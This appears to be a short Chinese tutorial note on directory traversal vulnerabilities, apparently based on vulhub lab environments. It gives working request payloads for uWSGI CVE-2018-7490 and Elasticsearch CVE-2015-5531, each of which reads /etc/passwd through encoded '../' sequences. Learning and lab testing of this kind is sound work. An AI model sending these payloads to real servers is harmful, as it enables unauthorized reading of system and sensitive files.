基础知识
目录穿越简单理解就是对于../没有做严格限制,攻击者可以通过../访问敏感信息。
URL编码和ASCII字符
%2F /
%20 空格
%3F ?
命令行下,curl 发送URL请求
Burpsuite Repeater模块发送各种请求Payload
实例
uWSGI PHP目录穿越漏洞 (CVE-2018-7490)
影响版本:2.0.17之前
uWSGI是一款Web应用程序服务器,在2.0.17之前没有正确处理DOCUMENT_ROOT导致用户可以利用../来跨域目录,读取DOCUMENT_ROOT目录以外的文件。
直接浏览器访问:
1 | http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd |
ElasticSearch 目录穿越漏洞(CVE-2015-5531)
http://vulhub.org/#/environments/elasticsearch/CVE-2015-5531/
https://www.exploit-db.com/exploits/38383/
影响版本:v1.6.1以下
ElasticSearch是一个基于分布式多用户能力的全文搜索引擎,基于Restful web接口。支持通过HTTP使用JSON进行数据索引。
1 | curl http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd |
ZipperDown IOS目录穿越
最近几天比较火的漏洞,算是ZipArchive包没限制../的一个问题吧。目前还没看到POC,持续关注中。。。